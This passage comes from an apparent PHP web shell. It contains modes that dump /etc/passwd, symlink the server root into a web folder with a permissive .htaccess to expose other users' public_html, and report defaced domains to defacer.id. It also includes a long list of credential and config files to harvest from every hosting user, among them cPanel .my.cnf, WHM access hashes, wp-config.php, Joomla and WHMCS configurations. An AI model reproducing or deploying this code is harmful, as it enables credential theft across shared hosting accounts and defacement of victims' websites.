  2290. }
  2291.  
  2292.  
  2293. }
  2294. }
  2295. echo "<center>
  2296. <a href=\"chonx_symconf/root/\">Root Server</a>
  2297. <br><a href=\"chonx_symconf/Passwords.txt\">Passwords</a>
  2298. <br><a href=\"chonx_symconf/\">Configurations</a></center>";
  2299. }
  2300. else
  2301. {
  2302. echo "<center>
  2303. <form method=\"POST\">
  2304. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2305. $file = '/etc/passwd';
  2306. $read = @fopen($file, 'r');
  2307. if ($read){
  2308. $body = @fread($read, @filesize($file));
  2309. echo "".htmlentities($body)."";
  2310. }
  2311. elseif(!$read)
  2312. {
  2313. $read = @show_source($file) ;
  2314. }
  2315. elseif(!$read)
  2316. {
  2317. $read = @highlight_file($file);
  2318. }
  2319. elseif(!$read)
  2320. {
  2321. for($uid=0;$uid<1000;$uid++)
  2322. {
  2323. $ara = posix_getpwuid($uid);
  2324. if (!empty($ara))
  2325. {
  2326. while (list ($key, $val) = each($ara))
  2327. {
  2328. print "$val:";
  2329. }
  2330. print "\n";
  2331. }}}
  2332.  
  2333. flush();
  2334.  
  2335. echo "</textarea>
  2336. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2337. </form></center>";
  2338. }
  2339. }
  2340. }
  2341. elseif($_GET['do'] == 'symlink') {
  2342. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2343. $d0mains = @file("/etc/named.conf");
  2344. ##httaces
  2345. if($d0mains){
  2346. @mkdir("chonx_sym",0777);
  2347. @chdir("chonx_sym");
  2348. @exe("ln -s / root");
  2349. $file3 = 'Options Indexes FollowSymLinks
  2350. DirectoryIndex janchonx.htm
  2351. AddType text/plain .php
  2352. AddHandler text/plain .php
  2353. Satisfy Any';
  2354. $fp3 = fopen('.htaccess','w');
  2355. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2356. echo "
  2357. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2358. <tr>
  2359. <td align=center><font size=2>S. No.</font></td>
  2360. <td align=center><font size=2>Domains</font></td>
  2361. <td align=center><font size=2>Users</font></td>
  2362. <td align=center><font size=2>Symlink</font></td>
  2363. </tr>";
  2364. $dcount = 1;
  2365. foreach($d0mains as $d0main){
  2366. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2367. flush();
  2368. if(strlen(trim($domains[1][0])) > 2){
  2369. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2370. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2371. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2372. <td>".$user['name']."</td>
  2373. <td><a href='$full/chonx_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2374. flush();
  2375. $dcount++;}}}
  2376. echo "</table>";
  2377. }else{
  2378. $TEST=@file('/etc/passwd');
  2379. if ($TEST){
  2380. @mkdir("chonx_sym",0777);
  2381. @chdir("chonx_sym");
  2382. exe("ln -s / root");
  2383. $file3 = 'Options Indexes FollowSymLinks
  2384. DirectoryIndex janchonx.htm
  2385. AddType text/plain .php
  2386. AddHandler text/plain .php
  2387. Satisfy Any';
  2388.  $fp3 = fopen('.htaccess','w');
  2389.  $fw3 = fwrite($fp3,$file3);
  2390.  @fclose($fp3);
  2391.  echo "
  2392.  <table align=center border=1><tr>
  2393.  <td align=center><font size=3>S. No.</font></td>
  2394.  <td align=center><font size=3>Users</font></td>
  2395.  <td align=center><font size=3>Symlink</font></td></tr>";
  2396.  $dcount = 1;
  2397.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2398.  while(!feof($file)){
  2399.  $s = fgets($file);
  2400.  $matches = array();
  2401.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2402.  $matches = str_replace("home/","",$matches[1]);
  2403.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2404.  continue;
  2405.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2406.  <td align=center><font class=txt>" . $matches . "</td>";
  2407.  echo "<td align=center><font class=txt><a href=$full/chonx_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2408.  $dcount++;}fclose($file);
  2409.  echo "</table>";}else{if($os != "Windows"){@mkdir("chonx_sym",0777);@chdir("chonx_sym");@exe("ln -s / root");$file3 = '
  2410.  Options Indexes FollowSymLinks
  2411. DirectoryIndex janchonx.htm
  2412. AddType text/plain .php
  2413. AddHandler text/plain .php
  2414. Satisfy Any
  2415. ';
  2416.  $fp3 = fopen('.htaccess','w');
  2417.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2418.  echo "
  2419.  <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  2420.  <table align=center border=1><tr>
  2421.  <td align=center><font size=3>ID</font></td>
  2422.  <td align=center><font size=3>Users</font></td>
  2423.  <td align=center><font size=3>Symlink</font></td></tr>";
  2424.  $temp = "";$val1 = 0;$val2 = 1000;
  2425.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2426.  if ($uid)$temp .= join(':',$uid)."\n";}
  2427.  echo '<br/>';$temp = trim($temp);$file5 =
  2428.  fopen("test.txt","w");
  2429.  fputs($file5,$temp);
  2430.  fclose($file5);$dcount = 1;$file =
  2431.  fopen("test.txt", "r") or exit("Unable to open file!");
  2432.  while(!feof($file)){$s = fgets($file);$matches = array();
  2433.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2434.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2435.  continue;
  2436.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2437.  <td align=center><font class=txt>" . $matches . "</td>";
  2438.  echo "<td align=center><font class=txt><a href=$full/chonx_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2439.  $dcount++;}
  2440.  fclose($file);
  2441.  echo "</table></div></center>";unlink("test.txt");
  2442.  } else
  2443.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  2444.  }
  2445.  }    
  2446. }
  2447. elseif($_GET['do'] == 'defacerid') {
  2448. echo "<center><form method='post'>
  2449.         <u>Defacer</u>: <br>
  2450.         <input type='text' name='hekel' size='50' value='Achon666ju5t'><br>
  2451.         <u>Team</u>: <br>
  2452.         <input type='text' name='tim' size='50' value='Extreme Crew'><br>
  2453.         <u>Domains</u>: <br>
  2454.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2455.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2456.         </form>";
  2457. $site = explode("\r\n", $_POST['sites']);
  2458. $go = $_POST['go'];
  2459. $hekel = $_POST['hekel'];
  2460. $tim = $_POST['tim'];
  2461. if($go) {
  2462. foreach($site as $sites) {
  2463. $zh = $sites;
  2464. $form_url = "https://www.defacer.id/notify";
  2465. $data_to_post = array();
  2466. $data_to_post['attacker'] = "$hekel";
  2467. $data_to_post['team'] = "$tim";
  2468. $data_to_post['poc'] = 'SQL Injection';
  2469. $data_to_post['url'] = "$zh";
  2470. $curl = curl_init();
  2471. curl_setopt($curl,CURLOPT_URL, $form_url);
  2472. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2473. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2474. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2475. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2476. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2477. $result = curl_exec($curl);
  2478. echo $result;
  2479. curl_close($curl);
  2480. echo "<br>";
  2481. }
  2482. }
  2483. }
  2484.  
  2485. elseif($_GET['do'] == 'config') {
  2486.     if($_POST){
  2487.         $passwd = $_POST['passwd'];
  2488.         mkdir("chonx_config", 0777);
  2489.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2490.         $htc = fopen("chonx_config/.htaccess","w");
  2491.         fwrite($htc, $isi_htc);
  2492.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2493.         foreach($user_config[1] as $user_chonx) {
  2494.             $user_config_dir = "/home/$user_chonx/public_html/";
  2495.             if(is_readable($user_config_dir)) {
  2496.                 $grab_config = array(
  2497.                                         "/home/$user_chonx/.my.cnf" => "cpanel",
  2498.                     "/home/$user_chonx/.accesshash" => "WHM-accesshash",
  2499.                     "/home/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2500.                     "/home/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2501.                     "/home/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2502.                     "/home/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",               
  2503.                     "/home/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2504.                     "/home/$user_chonx/public_html/forum/config.php" => "phpBB",
  2505.                     "/home/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2506.                     "/home/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2507.                     "/home/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2508.                     "/home/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2509.                     "/home/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2510.                     "/home/$user_chonx/public_html/application/config/database.php" => "Ellislab",                 
  2511.                     "/home/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2512.                     "/home/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2513.                     "/home/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2514.                     "/home/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2515.                     "/home/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2516.                     "/home/$user_chonx/public_html/submitticket.php" => "WHMCS",                                       
  2517.                     "/home/$user_chonx/public_html/configuration.php" => "Joomla",                 
  2518.                     "/home/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2519.                     "/home/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2520.                     "/home/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2521.                     "/home/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2522.                     "/home/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2523.                     "/home/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2524.                     "/home/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2525.                     "/home/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2526.                     "/home/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2527.                     "/home/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2528.                     "/home/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2529.                     "/home/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2530.                     "/home/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2531.                     "/home/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2532.                     "/home/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2533.                     "/home/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2534.                     "/home/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2535.                     "/home/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2536.                     "/home/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2537.                     "/home/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2538.                     "/home/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2539.                     "/home/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2540.                     "/home/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2541.                     "/home/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2542.                     "/home/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2543.                     "/home/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2544.                     "/home/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2545.                     "/home/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2546.                     "/home/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2547.                     "/home/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2548.                     "/home/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2549.                     "/home/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2550.                     "/home/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2551.                     "/home/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2552.                     "/home/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2553.                     "/home/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2554.                     "/home/$user_chonx/public_html/wp-config.php" => "WordPress",
  2555.                     "/home/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2556.                     "/home/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2557.                     "/home/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",       
  2558.                     "/home/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2559.                     "/home/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2560.                     "/home/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2561.                     "/home/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2562.                     "/home/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2563.                     "/home/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2564.                     "/home/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2565.                     "/home/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2566.                     "/home/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2567.                     "/home/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2568.                     "/home/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2569.                     "/home/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2570.                     "/home/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2571.                     "/home/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2572.                     "/home/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2573.                     "/home/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2574.                     "/home/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2575.                     "/home/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2576.                     "/home/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2577.                     "/home/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2578.                     "/home/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2579.                     "/home/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2580.                     "/home/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2581.                     "/home/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2582.                     "/home/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2583.                     "/home/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2584.                     "/home/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2585.                     "/home/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2586.                     "/home/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2587.                     "/home/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2588.                     "/home/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2589.                     "/home/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2590.                     "/home/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2591.                                         "/home1/$user_chonx/.my.cnf" => "cpanel",
  2592.                     "/home1/$user_chonx/.accesshash" => "WHM-accesshash",
  2593.                     "/home1/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2594.                     "/home1/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2595.                     "/home1/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2596.                     "/home1/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",              
  2597.                     "/home1/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2598.                     "/home1/$user_chonx/public_html/forum/config.php" => "phpBB",
  2599.                     "/home1/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2600.                     "/home1/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2601.                     "/home1/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2602.                     "/home1/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2603.                     "/home1/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2604.                     "/home1/$user_chonx/public_html/application/config/database.php" => "Ellislab",                
  2605.                     "/home1/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2606.                     "/home1/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2607.                     "/home1/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2608.                     "/home1/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2609.                     "/home1/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2610.                     "/home1/$user_chonx/public_html/submitticket.php" => "WHMCS",                                      
  2611.                     "/home1/$user_chonx/public_html/configuration.php" => "Joomla",                
  2612.                     "/home1/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2613.                     "/home1/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2614.                     "/home1/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",       
  2615.                     "/home1/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2616.                     "/home1/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2617.                     "/home1/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2618.                     "/home1/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2619.                     "/home1/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2620.                     "/home1/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2621.                     "/home1/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2622.                     "/home1/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2623.                     "/home1/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2624.                     "/home1/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2625.                     "/home1/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2626.                     "/home1/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2627.                     "/home1/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2628.                     "/home1/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2629.                     "/home1/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2630.                     "/home1/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2631.                     "/home1/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2632.                     "/home1/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2633.                     "/home1/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2634.                     "/home1/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2635.                     "/home1/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2636.                     "/home1/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2637.                     "/home1/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2638.                     "/home1/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2639.                     "/home1/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2640.                     "/home1/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2641.                     "/home1/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2642.                     "/home1/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2643.                     "/home1/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2644.                     "/home1/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2645.                     "/home1/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2646.                     "/home1/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2647.                     "/home1/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",                   
  2648.                     "/home1/$user_chonx/public_html/wp-config.php" => "WordPress",
  2649.                     "/home1/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2650.                     "/home1/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2651.                     "/home1/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",      
  2652.                     "/home1/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2653.                     "/home1/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2654.                     "/home1/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2655.                     "/home1/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2656.                     "/home1/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2657.                     "/home1/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2658.                     "/home1/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2659.                     "/home1/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2660.                     "/home1/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2661.                     "/home1/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2662.                     "/home1/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2663.                     "/home1/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2664.                     "/home1/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2665.                     "/home1/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2666.                     "/home1/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2667.                     "/home1/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2668.                     "/home1/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2669.                     "/home1/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2670.                     "/home1/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2671.                     "/home1/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2672.                     "/home1/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2673.                     "/home1/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2674.                     "/home1/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2675.                     "/home1/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2676.                     "/home1/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2677.                     "/home1/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2678.                     "/home1/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2679.                     "/home1/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2680.                     "/home1/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2681.                     "/home1/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2682.                     "/home1/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2683.                     "/home1/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2684.                     "/home1/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2685.                                         "/home2/$user_chonx/.my.cnf" => "cpanel",
  2686.                     "/home2/$user_chonx/.accesshash" => "WHM-accesshash",
  2687.                     "/home2/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2688.                     "/home2/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2689.                     "/home2/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2690.                     "/home2/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",              
  2691.                     "/home2/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2692.                     "/home2/$user_chonx/public_html/forum/config.php" => "phpBB",
  2693.                     "/home2/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2694.                     "/home2/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2695.                     "/home2/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2696.                     "/home2/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2697.                     "/home2/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2698.                     "/home2/$user_chonx/public_html/application/config/database.php" => "Ellislab",                
  2699.                     "/home2/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2700.                     "/home2/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2701.                     "/home2/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2702.                     "/home2/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2703.                     "/home2/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2704.                     "/home2/$user_chonx/public_html/submitticket.php" => "WHMCS",                                      
  2705.                     "/home2/$user_chonx/public_html/configuration.php" => "Joomla",                
  2706.                     "/home2/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2707.                     "/home2/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2708.                     "/home2/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",       
  2709.                     "/home2/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2710.                     "/home2/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2711.                     "/home2/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2712.                     "/home2/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2713.                     "/home2/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2714.                     "/home2/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2715.                     "/home2/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2716.                     "/home2/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2717.                     "/home2/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2718.                     "/home2/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2719.                     "/home2/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2720.                     "/home2/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2721.                     "/home2/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2722.                     "/home2/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2723.                     "/home2/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2724.                     "/home2/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2725.                     "/home2/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2726.                     "/home2/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2727.                     "/home2/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2728.                     "/home2/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2729.                     "/home2/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2730.                     "/home2/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2731.                     "/home2/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2732.                     "/home2/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2733.                     "/home2/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2734.                     "/home2/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2735.                     "/home2/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2736.                     "/home2/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2737.                     "/home2/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2738.                     "/home2/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2739.                     "/home2/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2740.                     "/home2/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2741.                     "/home2/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",                   
  2742.                     "/home2/$user_chonx/public_html/wp-config.php" => "WordPress",
